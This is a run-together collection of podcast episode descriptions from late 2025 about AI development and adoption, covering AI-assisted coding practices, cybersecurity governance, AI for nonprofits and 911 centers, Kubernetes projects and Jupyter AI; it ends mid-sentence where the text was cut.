POPULARITY
James and Frank unwrap 2025 as the Year of AI Development, covering new models, the rise of agents, and editor integrations like Copilot in VS Code that changed how developers write and maintain code. You'll hear practical takeaways—how next-edit, local models, RAG/vectorization and app‑on‑demand sped prototyping, slashed maintenance time, and why the hosts think the AI boom has legs into 2026 despite looming uncertainty. Follow Us Frank: Twitter, Blog, GitHub James: Twitter, Blog, GitHub Merge Conflict: Twitter, Facebook, Website, Chat on Discord Music : Amethyst Seer - Citrine by Adventureface ⭐⭐ Review Us (https://itunes.apple.com/us/podcast/merge-conflict/id1133064277?mt=2&ls=1) ⭐⭐ Machine transcription available on http://mergeconflict.fm
See omnystudio.com/listener for privacy information.
Podcast: PrOTect It All (LS 26 · TOP 10% what is this?)Episode: AI, Governance & Cybersecurity Culture: Why People and Process Still Matter MostPub date: 2025-12-15Get Podcast Transcript →powered by Listen411 - fast audio-to-text and summarizationCybersecurity has evolved from an afterthought to a business-critical responsibility - and AI is accelerating that shift faster than most organizations are ready for. In this episode of Protect It All, host Aaron Crow sits down with Sue McTaggart, a cybersecurity leader with a software development background and more than 15 years of experience driving security transformation. Together, they explore how cybersecurity success today depends less on shiny new tools and more on culture, governance, and fundamentals done right. Sue shares her journey from developer to cybersecurity leader, offering real-world insights into embedding security thinking into everyday work - not bolting it on after something breaks. The conversation tackles the realities of AI adoption, the risks of over-automation, and why human oversight and curiosity remain essential in an increasingly automated world. You'll learn: Why technology alone can't fix cybersecurity problems How to embed a security-first mindset across teams and leadership What AI changes - and what it doesn't - in cybersecurity governance The role of Zero Trust and foundational cyber hygiene Why people, process, and accountability prevent more breaches than tools How generational shifts and curiosity shape the future of cyber careers Whether you're a security leader, technologist, or business decision-maker navigating AI adoption, this episode delivers grounded, practical wisdom for building resilience that lasts. Tune in to learn why strong cybersecurity still starts with people, not platform,s only on Protect It All. Key Moments: 01:12 Cybersecurity Evolution and Insights 03:51 "Cybersecurity Requires Culture Shift" 07:09 "Tech Failures and Curfew Challenges" 10:30 "Prioritizing Security in AI Development" 15:05 Cybersecurity's Role in Everything 19:37 "Everything is Sales" 23:54 Adapting Communication for Audiences 26:26 "Think Ahead, Stay Curious." 28:30 Tinkering and Curiosity Unleashed 31:32 "Gen Z: Redefining Work and Life." 36:17 Governing AI: Benefits and Risks 37:59 AI Needs Human Oversight 42:35 "AI's Role in Cybersecurity." 47:25 "Hackers Exploit Basic Vulnerabilities." About the guest: Sue McTaggart is a passionate educator and cybersecurity professional with a strong background in software development. Her curiosity and desire to raise awareness led her to transition from developing applications primarily in languages like Java in the early 2000s to the field of cybersecurity. Sue is dedicated to empowering others through education and strives to share her knowledge to help others better understand cybersecurity risks and solutions. She is honored and humbled by opportunities to speak about her work and continues to inspire those around her with her commitment to ongoing learning and public awareness. How to connect Sue: https://www.linkedin.com/in/sue-mctaggart-24604158/ Connect With Aaron Crow: Website: www.corvosec.com LinkedIn: https://www.linkedin.com/in/aaronccrow Learn more about PrOTect IT All: Email: info@protectitall.co Website: https://protectitall.co/ X: https://twitter.com/protectitall YouTube: https://www.youtube.com/@PrOTectITAll FaceBook: https://facebook.com/protectitallpodcast To be a guest or suggest a guest/episode, please email us at info@protectitall.co Please leave us a review on Apple/Spotify Podcasts: Apple - https://podcasts.apple.com/us/podcast/protect-it-all/id1727211124 Spotify - https://open.spotify.com/show/1Vvi0euj3rE8xObK0yvYi4The podcast and artwork embedded on this page are from Aaron Crow, which is the property of its owner and not affiliated with or endorsed by Listen Notes, Inc.
In this enlightening episode, Brandon Stiver is joined by Albert Chen, who is the cofounder and CEO of Anago. The two discuss the profound impact of AI on Christian nonprofits. Albert shares his journey from community development in Mexico to the tech world and emphasizes the interconnectedness of global issues with the ethical considerations surrounding AI development. Albert demystifies AI, explaining the differences between machine learning and generative AI, and offers practical applications for nonprofits. He introduces the concept of Redemptive AI, advocating for its ethical use to benefit the global majority. The conversation concludes with a call for Christian organizations to engage thoughtfully with AI, ensuring it enhances their mission rather than detracts from it. Podcast Sponsors Take the free Core Elements Self-Assessment from the CAFO Research Center and tap into online courses with discount code 'TGDJ25' Take the Free Core Elements Self-Assessment Resources and Links from the show Anago.ai Online Praxis : A Redemptive Thesis for Artificial Intelligence Support the Show Through Venmo - @canopyintl Conversation Notes Introduction to AI and Its Impact on Nonprofits (2:30) Albert's Journey through ministry and tech (5:22) Understanding Global Interconnectedness (8:21) The Role of Technology in Community Development (11:23) Demystifying AI: Machine Learning vs. Generative AI (14:27) Ethical Considerations in AI Development (17:20) Navigating AI as a Christian Nonprofit Leader (20:39) The Role of AI in Nonprofit Organizations (32:54) Augmentation vs. Automation in Nonprofits (38:20) Christian Hope and Responsibility in the Age of AI (43:24) Theme music Kirk Osamayo. Free Music Archive, CC BY License
Today, we explore the evolving landscape of conversational AI with Kylan Gibbs, the CEO and founder of InWorld AI. We focus on how InWorld develops AI products that enhance the creation of scalable applications, particularly in consumer contexts where user interaction is increasingly conversational. Kylan shares insights into the importance of real-time performance and how expectations differ between consumer and business applications. He emphasizes that while businesses often prioritize automation and factuality, consumer applications demand speed and engagement, requiring a nuanced approach to AI design. Join us as we delve into the technical challenges and innovations that are shaping the future of AI interactions.The podcast features a deep dive into the evolving landscape of software architecture, focusing on the role of AI in modern applications. Our guest, Kylan Gibbs, the CEO of InWorld AI, discusses how his company builds AI products that facilitate real-time conversational experiences for users. Kylan emphasizes that the majority of consumer interactions with AI now occur through conversational interfaces, such as chatbots and voice assistants. He explains that InWorld specializes in creating scalable applications that not only meet user demands but also adapt to varying contexts, such as customer support, gaming, and educational applications. This adaptability is crucial because user expectations differ significantly across different scenarios. The conversation further explores the intricate balance between performance and user experience, highlighting how different user expectations influence the design and functionality of AI-driven applications. Kylan shares insights into the engineering challenges that come with real-time AI interactions, emphasizing the need for robust performance engineering to deliver smooth conversational flows. He believes that as AI technology progresses, the focus should shift towards enhancing user engagement while maintaining high performance standards. Overall, this episode offers valuable insights into how software architects can navigate the complexities of integrating AI into consumer-facing applications while ensuring that the user experience remains at the forefront.Takeaways: InWorld AI focuses on creating conversational interfaces that improve user engagement in applications. The performance of real-time conversational AI is crucial, requiring fast and precise responses. Consumer AI applications need to adapt to various contexts, changing user expectations significantly. Optimizing AI performance often requires using low-level programming languages like C for better control. AI spending is increasingly shifting towards consumer applications, presenting new opportunities for developers. Understanding the nuances of AI architecture is essential for creating effective conversational agents. Links referenced in this episode:softwarearchitectureinsights.cominworld.aiCompanies mentioned in this episode: InWorld AI OpenAI Google Mentioned in this episode:How do you operate a modern organization at scale?Read more in my O'Reilly Media book "Architecting for Scale", now in its second edition. http://architectingforscale.com Architecting for ScaleWhat do 160,000 of your peers have in common?They've all boosted their skills and career prospects by taking one of my courses. Go to atchisonacademy.com.Atchison Academy
Utah held an AI Summit yesterday, and the governor has 6 key areas he wants the state to focus on and emphasized that humans should stay in control. Greg and Holly discuss the latest and speak with Margaret Busse, Executive Director of Utah’s Department of Commerce, about the event, AI priorities for the state and how Utah can get ahead of the federal government with AI regulation.
AI Assisted Coding: Treating AI Like a Junior Engineer - Onboarding Practices for AI Collaboration In this special episode, Sergey Sergyenko, CEO of Cybergizer, shares his practical framework for AI-assisted development built on transactional models, Git workflows, and architectural conventions. He explains why treating AI like a junior engineer, keeping commits atomic, and maintaining rollback strategies creates production-ready code rather than just prototypes. Vibecoding: An Automation Design Instrument "I would define Vibecoding as an automation design instrument. It's not a tool that can deliver end-to-end solution, but it's like a perfect set of helping hands for a person who knows what they need to do." Sergey positions vibecoding clearly: it's not magic, it's an automation design tool. The person using it must know what they need to accomplish—AI provides the helping hands to execute that vision faster. This framing sets expectations appropriately: AI speeds up development significantly, but it's not a silver bullet that works without guidance. The more you practice vibecoding, the better you understand its boundaries. Sergey's definition places vibecoding in the evolution of development tools: from scaffolding to co-pilots to agentic coding to vibecoding. Each step increases automation, but the human architect remains essential for providing direction, context, and validation. Pair Programming with the Machine "If you treat AI as a junior engineer, it's very easy to adopt it. Ah, okay, maybe we just use the old traditions, how we onboard juniors to the team, and let AI follow this step." One of Sergey's most practical insights is treating AI like a junior engineer joining your team. This mental model immediately clarifies roles and expectations. You wouldn't let a junior architect your system or write all your tests—so why let AI? Instead, apply existing onboarding practices: pair programming, code reviews, test-driven development, architectural guidance. This approach leverages Extreme Programming practices that have worked for decades. The junior engineer analogy helps teams understand that AI needs mentorship, clear requirements, and frequent validation. Just as you'd provide a junior with frameworks and conventions to follow, you constrain AI with established architectural patterns and framework conventions like Ruby on Rails. The Transactional Model: Atomic Commits and Rollback "When you're working with AI, the more atomic commits it delivers, more easy for you to kind of guide and navigate it through the process of development." Sergey's transactional approach transforms how developers work with AI. Instead of iterating endlessly when something goes wrong, commit frequently with atomic changes, then rollback and restart if validation fails. Each commit should be small, independent, and complete—like a feature flag you can toggle. The commit message includes the prompt sequence used to generate the code and rollback instructions. This approach makes the Git repository the context manager, not just the AI's memory. When you need to guide AI, you can reference specific commits and their context. This mirrors trunk-based development practices where teams commit directly to master with small, verified changes. The cost of rollback stays minimal because changes are atomic, making this strategy far more efficient than trying to fix broken implementations through iteration. Context Management: The Weak Point and the Solution "Managing context and keeping context is one of the weak points of today's coding agents, therefore we need to be very mindful in how we manage that context for the agent." Context management challenges current AI coding tools—they forget, lose thread, or misinterpret requirements over long sessions. Sergey's solution is embedding context within the commit history itself. Each commit links back to the specific reasoning behind that code: why it was accepted, what iterations it took, and how to undo it if needed. This creates a persistent context trail that survives beyond individual AI sessions. When starting new features, developers can reference previous commits and their context to guide the AI. The transactional model doesn't just provide rollback capability—it creates institutional memory that makes AI progressively more effective as the codebase grows. TDD 2.0: Humans Write Tests, AI Writes Code "I would never allow AI to write the test. I would do it by myself. Still, it can write the code." Sergey is adamant about roles: humans write tests, AI writes implementation code. This inverts traditional TDD slightly—instead of developers writing tests then code, they write tests and AI writes the code to pass them. Tests become executable requirements and prompts. This provides essential guardrails: AI can iterate on implementation until tests pass, but it can't redefine what "passing" means. The tests represent domain knowledge, business requirements, and validation criteria that only humans should control. Sergey envisions multi-agent systems where one agent writes code while another validates with tests, but critically, humans author the original test suite. This TDD 2.0 framework (a talk Sergey gave at the Global Agile Summit) creates a verification mechanism that prevents the biggest anti-pattern: coding without proper validation. The Two Cardinal Rules: Architecture and Verification "I would never allow AI to invent architecture. Writing AI agentic coding, Vibecoding, whatever coding—without proper verification and properly setting expectations of what you want to get as a result—that's the main mistake." Sergey identifies two non-negotiables. First, never let AI invent architecture. Use framework conventions (Rails, etc.) to constrain AI's choices. Leverage existing code generators and scaffolding. Provide explicit architectural guidelines in planning steps. Store iteration-specific instructions where AI can reference them. The framework becomes the guardrails that prevent AI from making structural decisions it's not equipped to make. Second, always verify AI output. Even if you don't want to look at code, you must validate that it meets requirements. This might be through tests, manual review, or automated checks—but skipping verification is the fundamental mistake. These two rules—human-defined architecture and mandatory verification—separate successful AI-assisted development from technical debt generation. Prototype vs. Production: Two Different Workflows "When you pair as an architect or a really senior engineer who can implement it by himself, but just wants to save time, you do the pair programming with AI, and the AI kind of ships a draft, and rapid prototype." Sergey distinguishes clearly between prototype and production development. For MVPs and rapid prototypes, a senior architect pairs with AI to create drafts quickly—this is where speed matters most. For production code, teams add more iterative testing and polishing after AI generates initial implementation. The key is being explicit about which mode you're in. The biggest anti-pattern is treating prototype code as production-ready without the necessary validation and hardening steps. When building production systems, Sergey applies the full transactional model: atomic commits, comprehensive tests, architectural constraints, and rollback strategies. For prototypes, speed takes priority, but the architectural knowledge still comes from humans, not AI. The Future: AI Literacy as Mandatory "Being a software engineer and trying to get a new job, it's gonna be a mandatory requirement for you to understand how to use AI for coding. So it's not enough to just be a good engineer." Sergey sees AI-assisted coding literacy becoming as fundamental as Git proficiency. Future engineering jobs will require demonstrating effective AI collaboration, not just traditional coding skills. We're reaching good performance levels with AI models—now the challenge is learning to use them efficiently. This means frameworks and standardized patterns for AI-assisted development will emerge and consolidate. Approaches like AAID, SpecKit, and others represent early attempts to create these patterns. Sergey expects architectural patterns for AI-assisted development to standardize, similar to how design patterns emerged in object-oriented programming. The human remains the bottleneck—for domain knowledge, business requirements, and architectural guidance—but the implementation mechanics shift heavily toward AI collaboration. Resources for Practitioners "We are reaching a good performance level of AI models, and now we need to guide it to make it impactful. It's a great tool, now we need to understand how to make it impactful." Sergey recommends Obie Fernandez's work on "Patterns of Application Development Using AI," particularly valuable for Ruby and Rails developers but applicable broadly. He references Andrey Karpathy's original vibecoding post and emphasizes Extreme Programming practices as foundational. The tools he uses—Cursor and Claude Code—support custom planning steps and context management. But more important than tools is the mindset: we have powerful AI capabilities now, and the focus must shift to efficient usage patterns. This means experimenting with workflows, documenting what works, and sharing patterns with the community. Sergey himself shares case studies on LinkedIn and travels extensively speaking about these approaches, contributing to the collective learning happening in real-time. About Sergey Sergyenko Sergey is the CEO of Cybergizer, a dynamic software development agency with offices in Vilnius, Lithuania. Specializing in MVPs with zero cash requirements, Cybergizer offers top-tier CTO services and startup teams. Their tech stack includes Ruby, Rails, Elixir, and ReactJS. Sergey was also a featured speaker at the Global Agile Summit, and you can find his talk available in your membership area. If you are not a member don't worry, you can get the 1-month trial and watch the whole conference. You can cancel at any time. You can link with Sergey Sergyenko on LinkedIn.
BONUS: Augmented AI Development - Software Engineering First, AI Second In this special episode, Dawid Dahl introduces Augmented AI Development (AAID)—a disciplined approach where professional developers augment their capabilities with AI while maintaining full architectural control. He explains why starting with software engineering fundamentals and adding AI where appropriate is the opposite of most frameworks, and why this approach produces production-grade software rather than technical debt. The AAID Philosophy: Don't Abandon Your Brain "Two of the fundamental developer principles for AAID are: first, don't abandon your brain. And the second is incremental steps." Dawid's Augmented AI Development framework stands in stark contrast to "vibecoding"—which he defines strictly as not caring about code at all, only results on screen. AAID is explicitly designed for professional developers who maintain full understanding and control of their systems. The framework is positioned on the furthest end of the spectrum from vibe coding, requiring developers to know their craft deeply. The two core principles—don't abandon your brain, work incrementally—reflect a philosophy that AI is a powerful collaborator, not a replacement for thinking. This approach recognizes that while 96% of Dawid's code is now written by AI, he remains the architect, constantly steering and verifying every step. In this segment we refer to Marcus Hammarberg's work and his book The Bungsu Story. Software Engineering First, AI Second: A Hill to Die On "You should start with software engineering wisdom, and then only add AI where it's actually appropriate. I think this is super, super important, and the entire foundation of this framework. This is a hill I will personally die on." What makes AAID fundamentally different from other AI-assisted development frameworks is its starting point. Most frameworks start with AI capabilities and try to add structure and best practices afterward. Dawid argues this is completely backwards. AAID begins with 50-60 years of proven software engineering wisdom—test-driven development, behavior-driven development, continuous delivery—and only then adds AI where it enhances the process. This isn't a minor philosophical difference; it's the foundation of producing maintainable, production-grade software. Dawid admits he's sometimes "manipulating developers to start using good, normal software engineering practices, but in this shiny AI box that feels very exciting and new." If the AI wrapper helps developers finally adopt TDD and BDD, he's fine with that. Why TDD is Non-Negotiable with AI "Every time I prompt an AI and it writes code for me, there is often at least one or two or three mistakes that will cause catastrophic mistakes down the line and make the software impossible to change." Test-driven development isn't just a nice-to-have in AAID—it's essential. Dawid has observed that AI consistently makes 2-3 mistakes per prompt that could have catastrophic consequences later. Without TDD's red-green-refactor cycle, these errors accumulate, making code increasingly difficult to change. TDD answers the question "Is my code technically correct?" while acceptance tests answer "Is the system releasable?" Both are needed for production-grade software. The refactor step is where 50-60 years of software engineering wisdom gets applied to make code maintainable. This matters because AAID isn't vibe coding—developers care deeply about code quality, not just visible results. Good software, as Dave Farley says, is software that's easy to change. Without TDD, AI-generated code becomes a maintenance nightmare. The Problem with "Prompt and Pray" Autonomous Agents "When I hear 'our AI can now code for over 30 hours straight without stopping,' I get very afraid. You fall asleep, and the next morning, the code is done. Maybe the tests are green. But what has it done in there? Imagine everything it does for 30 hours. This system will not work." Dawid sees two diverging paths for AI-assisted development's future. The first—autonomous agents working for hours or days without supervision—terrifies him. The marketing pitch sounds appealing: prompt the AI, go to sleep, wake up to completed features. But the reality is technical debt accumulation at scale. Imagine all the decisions, all the architectural choices, all the mistakes an AI makes over 30 hours of autonomous work. Dawid advocates for the stark contrast: working in extremely small increments with constant human steering, always aligned to specifications. His vision of the future isn't AI working alone—it's voice-controlled confirmations where he says "Yes, yes, no, yes" as AI proposes each tiny change. This aligns with DORA metrics showing that high-performing teams work in small batches with fast feedback loops. Prerequisites: Product Discovery Must Come First "Without Dave Farley, this framework would be totally different. I think he does everything right, basically. With this framework, I want to stand on the shoulders of giants and work on top of what has already been done." AAID explicitly requires product discovery and specification phases before AI-assisted coding begins. This is based on Dave Farley's product journey model, which shows how products move from idea to production. AAID starts at the "executable specifications" stage—it requires input specifications from prior discovery work. This separates specification creation (which Dawid is addressing in a separate "Dream Encoder" framework) from code execution. The prerequisite isn't arbitrary; it acknowledges that AI-assisted implementation works best when the problem is well-defined. This "standing on shoulders of giants" approach means AAID doesn't try to reinvent software engineering—it leverages decades of proven practices from TDD pioneers, BDD creators, and continuous delivery experts. What's Wrong with Other AI Frameworks "When the AI decides to check the box [in task lists], that means this is the definition of done. But how is the AI taking that decision? It's totally ad hoc. It's like going back to the 1980s: 'I wrote the code, I'm done.' But what does that mean? Nobody has any idea." Dawid is critical of current AI frameworks like SpecKit, pointing out fundamental flaws. They start with AI first and try to add structure later (backwards approach). They use task lists with checkboxes where AI decides when something is "done"—but without clear criteria, this becomes ad hoc decision-making reminiscent of 1980s development practices. These frameworks "vibecode the specs," not realizing there's a structured taxonomy to specifications that BDD already solved. Most concerning, some have removed testing as a "feature," treating it as optional. Dawid sees these frameworks as over-engineered, process-centric rather than developer-centric, often created by people who may not develop software themselves. AAID, in contrast, is built by a practicing developer solving real problems daily. Getting Started: Learn Fundamentals First "The first thing developers should do is learn the fundamentals. They should skip AI altogether and learn about BDD and TDD, just best practices. But when you know that, then you can look into a framework, maybe like mine." Dawid's advice for developers interested in AI-assisted coding might seem counterintuitive: start by learning fundamentals without AI. Master behavior-driven development, test-driven development, and software engineering best practices first. Only after understanding these foundations should developers explore frameworks like AAID. This isn't gatekeeping—it's recognizing that AI amplifies whatever approach developers bring. If they start with poor practices, AI will help them build unmaintainable systems faster. But if they start with solid fundamentals, AI becomes a powerful multiplier that lets them work at unprecedented speed while maintaining quality. AAID offers both a dense technical article on dev.to and a gentler game-like onboarding in the GitHub repo, meeting developers wherever they are in their journey. About Dawid Dahl Dawid is the creator of Augmented AI Development (AAID), a disciplined approach where developers augment their capabilities by integrating with AI, while maintaining full architectural control. Dawid is a software engineer at Umain, a product development agency. You can link with Dawid Dahl on LinkedIn and find the AAID framework on GitHub.
China's AI Strategy and Chip Self-Sufficiency Guest: Jack Burnham Jack Burnham discussed China's AI development, which prioritizes political control and self-sufficiency over immediate excellence, evidenced by the Chinese Cyberspace Administration banning large internet companies from purchasing high-end Nvidia processors, with the CCP aiming to build out its own domestic systems to insulate itself from potential U.S. leverage, while the Chinese DeepSeek AI model is considered a "good enough" open-source competitor due to its low cost, accessibility, and high quality in certain computations, despite some identified security issues. 1900
The robots aren't in charge... yet!In this episode of the She Geeks Out podcast, we chat with Rashmi Jolly, founder of Assideo Consulting, global innovation leader, and deeply thoughtful future-of-work nerd, to talk about what happens when AI collides with humanity, power, and culture.Rashmi shares her wild journey from immigrant kid with “doctor or bust” expectations, to Wall Street, to entrepreneurship in women's health and genetics, to roles at the Economist Intelligence Unit, Mastercard, and Bain's innovation group, and now to life split between Dubai, Zurich, and her kids' school in the U.S. Together, we explore:How AI is being treated like the new high-priced consultant, and what gets lost when leaders trust the tool more than their own peopleThe quiet ways generative AI is eroding creativity, learning, and confidence, especially for younger workers who never got to solve problems without itThe ethics red flags Rashmi is most worried about, from biased datasets in women's health to opaque data collection and “empathetic” chatbots that are a little too good at keeping us hookedHow different countries (including China, Singapore, and the UAE) are regulating tech, education, and kids' screen time, and what the U.S. might learn from that, even with all the complexities and human rights concernsWhy psychological safety is non-negotiable for real innovation, and how framing work as “serving another human” changes everythingRashmi also shares hopeful stories about her kids and their peers, the emotional language they're developing, and why she still believes the next generation can pull us out of this feverish tech dream and back into a more grounded, human way of working.If you care about AI, inclusion, power, leadership, and what kind of world we're handing to young people, this one will stick with you long after you hit pause.Episode Chapters:(0:00:07) - Intro (Felicia and Rachel) Neuroscience of Trust in Workplace(0:10:16) - Navigating a Dynamic Work Landscape(0:16:45) - Reimagining Work in AI-Era(0:28:00) - Balancing Empathy in AI Development(0:41:33) - Building Psychological Safety for Innovation(0:54:19) - Ethical Concerns in AI Development(1:00:52) - Cultural Perspectives on Future Work Visit us at InclusionGeeks.com to stay up to date on all the ways you can make the workplace work for everyone! Check out Inclusion Geeks Academy and InclusionGeeks.com/podcast for the code to get a free mini course.
Dive deep into the transformative power of Generative AI in the public safety sector with Chad Brothers, Vice President for Emergency Services Programs at Viiz Communications, on this episode of Cloud and Clear! Viiz Communications is addressing the critical challenges faced by 911 centers (PSAPs), including a significant staffing crisis and the distraction caused by high volumes of non-emergency calls. Learn how their solution uses Gen AI with conversational "playbooks" and a Retrieval-Augmented Generation (RAG) approach to efficiently triage and respond to non-urgent inquiries. Chad Brothers explains how this intelligent routing lessens the workload on human telecommunicators, allowing them to focus on emergencies, and details the future plans to automate into CAD systems and integrate spatial data. Key Takeaways: Viiz Communications is an emergency services solutions provider, supporting call centers and non-emergency solutions in the public safety space. Gen AI provides a technology solution to the staffing crisis and high volume of non-emergency calls at 911 centers. The solution uses playbooks and a RAG approach to formulate accurate, generative responses from public and non-public data. It improves telecommunicator quality of life by reducing non-emergency call volume and context switching. True emergencies that come through administrative lines are immediately filtered out and follow a deterministic flow to a human 911 agent. Tune in to discover how AI is enhancing service and support for our telecommunicators and communities! Join us for more content by liking, sharing, and subscribing! Connect with SADA & Viiz Communications: Learn more about SADA: https://sada.com/cloud-and-clear/ Explore Viiz Communications: https://viiz.com/ Learn more about ViizVital: https://viiz.com/viizviital Read our Viiz Communications case study: https://sada.com/customer-story/viiz-communications-launches-next-generation-911-call-solution-on-google-cloud-ccaas-with-sadas-help/ Host: Chad Johnson, Director of AI Development at Insight Guest: Chad Brothers, Vice President of Emergency Services Programs at Viiz Communications
Major banks once built their own Linux kernels because no distributions existed, but today commercial distros — and Kubernetes — are universal. At KubeCon + CloudNativeCon North America, AWS's Jesse Butler noted that Kubernetes has reached the same maturity Linux once did: organizations no longer build bespoke control planes but rely on shared standards. That shift influences how AWS contributes to open source, emphasizing community-wide solutions rather than AWS-specific products.Butler highlighted two AWS EKS projects donated to Kubernetes SIGs: KRO and Karpenter. KRO addresses the proliferation of custom controllers that emerged once CRDs made everything representable as Kubernetes resources. By generating CRDs and microcontrollers from simple YAML schemas, KRO transforms “glue code” into an automated service within Kubernetes itself. Karpenter tackles the limits of traditional autoscaling by delivering just-in-time, cost-optimized node provisioning with a flexible, intuitive API. Both projects embody AWS's evolving philosophy: building features that serve the entire Kubernetes ecosystem as it matures into a true enterprise standard.Learn more from The New Stack about the latest in Kube Resource Orchestrator and Karpenter: Migrating From Cluster Autoscaler to Karpenter v0.32How Amazon EKS Auto Mode Simplifies Kubernetes Cluster Management (Part 1) Kubernetes Gets a New Resource Orchestrator in the Form of KroJoin our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
Clockwork began with a narrow goal—keeping clocks synchronized across servers—but soon realized that its precise latency measurements could reveal deeper data center networking issues. This insight led the company to build a hardware-agnostic monitoring and remediation platform capable of automatically routing around faults. Today, Clockwork's technology is especially valuable for large GPU clusters used in training LLMs, where communication efficiency and reliability are critical. CEO Suresh Vasudevan explains that AI workloads are among the most demanding distributed applications ever, and Clockwork provides building blocks that improve visibility, performance and fault tolerance. Its flagship feature, FleetIQ, can reroute traffic around failing switches, preventing costly interruptions that might otherwise force teams to restart training from hours-old checkpoints. Although the company originated from Stanford research focused on clock synchronization for financial institutions, the team eventually recognized that packet-timing data could underpin powerful network telemetry and dynamic traffic control. By integrating with NVIDIA NCCL, TCP and RDMA libraries, Clockwork can not only measure congestion but also actively manage GPU communication to enhance both uptime and training efficiency. Learn more from The New Stack about the latest in Clockwork: Clockwork's FleetIQ Aims To Fix AI's Costly Network Bottleneck What Happens When 116 Makers Reimagine the Clock? Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
Jupyter AI v3 marks a major step forward in integrating intelligent coding assistance directly into JupyterLab. Discussed by AWS engineers David Qiu and Piyush Jain at JupyterCon, the new release introduces AI personas— customizable, specialized assistants that users can configure to perform tasks such as coding help, debugging, or analysis. Unlike other AI tools, Jupyter AI allows multiple named agents, such as “Claude Code” or “OpenAI Codex,” to coexist in one chat. Developers can even build and share their own personas as local or pip-installable packages. This flexibility was enabled by splitting Jupyter AI's previously large, complex codebase into smaller, modular packages, allowing users to install or replace components as needed. Looking ahead, Qiu envisions Jupyter AI as an “ecosystem of AI personas,” enabling multi-agent collaboration where different personas handle roles like data science, engineering, and testing. With contributors from AWS, Apple, Quansight, and others, the project is poised to expand into a diverse, community-driven AI ecosystem.Learn more from The New Stack about the latest in Jupyter AI development: Introduction to Jupyter Notebooks for DevelopersDisplay AI-Generated Images in a Jupyter NotebookJoin our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
AI Unraveled: Latest AI News & Trends, Master GPT, Gemini, Generative AI, LLMs, Prompting, GPT Store
AI Daily News Rundown November 11 2025:Welcome to AI Unraveled, Your daily briefing on the real world business impact of AIListen at https://podcasts.apple.com/us/podcast/ai-daily-news-rundown-openai-is-exploring-ai-tools/id1684415169?i=1000736172688In today's edition:
Send us a textIn this episode of Embedded Insiders, the VP of Sales and Business Development at Gateworks Corporation, Kelly Peralta, joins me to discuss the trends, challenges, and innovations surrounding Wi-Fi HaLow for industrial and IoT applications.The next segment is sponsored by Analog Devices, and Contributing Editor, Rich Nass, and Analog Devices' Senior Vice President of Software and Digital Platforms, Rob Oshan, discuss the complexity of designing AI systems and how Analog Devices' CodeFusion Studio, which includes an IDE, a software development kit, and coding tools, is designed to accelerate the process. Check out the embedded world North America 2025 Best-in-Show winners. For more information, visit embeddedcomputing.com
- Election Day in New York City and Political Predictions (0:09) - Joe Biden's List and Tariff Power Debate (2:18) - Impact of Trump's Tariffs on Businesses (6:28) - Healthcare System and Personal Anecdotes (11:38) - Censored.news Updates and Danish Cattle Crisis (14:13) - Introduction of Sentry Robots and Honda's Autonomous Mower (18:55) - Impact of AI on Job Markets (29:44) - Power Grid and AI Race (43:52) - Challenges in AI Development and Implementation (57:32) - Conclusion and Call to Action (1:09:30) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
Magdalena Picariello reframes how we think about AI, moving the conversation from algorithms and metrics to business impact and outcomes. She champions evaluation systems that don't just measure accuracy but also demonstrate real-world business value, and advocates for iterative development with continuous feedback to build optimal applications. Read a transcript of this interview: http://bit.ly/4oqUIMv Subscribe to the Software Architects' Newsletter for your monthly guide to the essential news and experience from industry peers on emerging patterns and technologies: https://www.infoq.com/software-architects-newsletter Upcoming Events: QCon San Francisco 2025 (November 17-21, 2025) Get practical inspiration and best practices on emerging software trends directly from senior software developers at early adopter companies. https://qconsf.com/ QCon AI New York 2025 (December 16-17, 2025) https://ai.qconferences.com/ QCon London 2026 (March 16-19, 2026) https://qconlondon.com/ The InfoQ Podcasts: Weekly inspiration to drive innovation and build great teams from senior software leaders. Listen to all our podcasts and read interview transcripts: - The InfoQ Podcast https://www.infoq.com/podcasts/ - Engineering Culture Podcast by InfoQ https://www.infoq.com/podcasts/#engineering_culture - Generally AI: https://www.infoq.com/generally-ai-podcast/ Follow InfoQ: - Mastodon: https://techhub.social/@infoq - X: https://x.com/InfoQ?from=@ - LinkedIn: https://www.linkedin.com/company/infoq/ - Facebook: https://www.facebook.com/InfoQdotcom# - Instagram: https://www.instagram.com/infoqdotcom/?hl=en - Youtube: https://www.youtube.com/infoq - Bluesky: https://bsky.app/profile/infoq.com Write for InfoQ: Learn and share the changes and innovations in professional software development. - Join a community of experts. - Increase your visibility. - Grow your career. https://www.infoq.com/write-for-infoq
In this episode of The New Stack Podcast, hosts Alex Williams and Frederic Lardinois spoke with Keith Ballinger, Vice President and General Manager of Google Cloud Platform Developer Experience (GPC), about the evolution of agentic coding tools and the future of programming. Ballinger, a hands-on executive who still codes, discussed Gemini CLI, Google's response to tools like Claude Code, and his broader philosophy on how developers should work with AI. He emphasized that these tools are in their “first inning” and that developers must “slow down to speed up” by writing clear guides, focusing on architecture, and documenting intent—treating AI as a collaborative coworker rather than a one-shot solution. Ballinger reflected on his early AI experiences, from Copilot at GitHub to modern agentic systems that automate tool use. He also explored the resurgence of the command line as an AI interface and predicted that programming will increasingly shift from writing code to expressing intent. Ultimately, he envisions a future where great programmers are great writers, focusing on clarity, problem decomposition, and design rather than syntax. Learn more from The New Stack about the latest in Google AI development: Why PyTorch Gets All the Love Lightning AI Brings a PyTorch Copilot to Its Development Environment Ray Comes to the PyTorch Foundation Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See 